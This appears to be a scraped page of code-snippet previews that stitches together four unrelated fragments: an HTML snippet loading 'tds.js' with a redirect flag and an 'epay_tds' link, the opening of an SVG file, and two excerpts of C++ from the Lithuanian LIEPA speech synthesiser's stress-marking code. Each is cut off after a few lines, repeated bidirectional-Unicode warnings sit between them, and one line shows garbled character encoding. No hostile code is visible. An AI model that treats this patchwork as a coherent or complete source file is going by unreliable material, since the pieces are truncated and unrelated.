This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script src="tds.js"></script> | |
<script> var redirect = true; </script> | |
<a href="/1y8m" class="epay_tds"> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8" standalone="no"?> | |
<svg | |
xmlns:dc="http://purl.org/dc/elements/1.1/" | |
xmlns:cc="http://creativecommons.org/ns#" | |
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" | |
xmlns:svg="http://www.w3.org/2000/svg" | |
xmlns="http://www.w3.org/2000/svg" | |
width="297mm" | |
version="1.1" | |
height="210mm" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/////////////////////////////////////////////////////////////////////////////////////////////////// | |
// | |
// Projektas LIEPA (https://liepa.raðtija.lt) | |
// Sintezatoriaus komponentas transcrLUSS.dll | |
// Failas KircDB.cpp | |
// Autorius dr. Pijus Kasparaitis (pkasparaitis@yahoo.com) | |
// 2015 08 11 | |
// | |
/////////////////////////////////////////////////////////////////////////////////////////////////// | |
#include "stdafx.h" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//--------------------------------------------------------------------------------------- | |
int Kirciuoti(char *Zodis, char *SkPb, variantas *Variant) | |
{ | |
char AtvZod[ZODIL1]; | |
char ZodK[ZODIL1]; | |
int ilg, i, j, k, l, m, kg, kn; | |
int kpg, kpgn, varsk=0, rs, mini, maxi; | |
int KircS, Priegaid, PriesIlgis, Skiemen, Tarptaut; |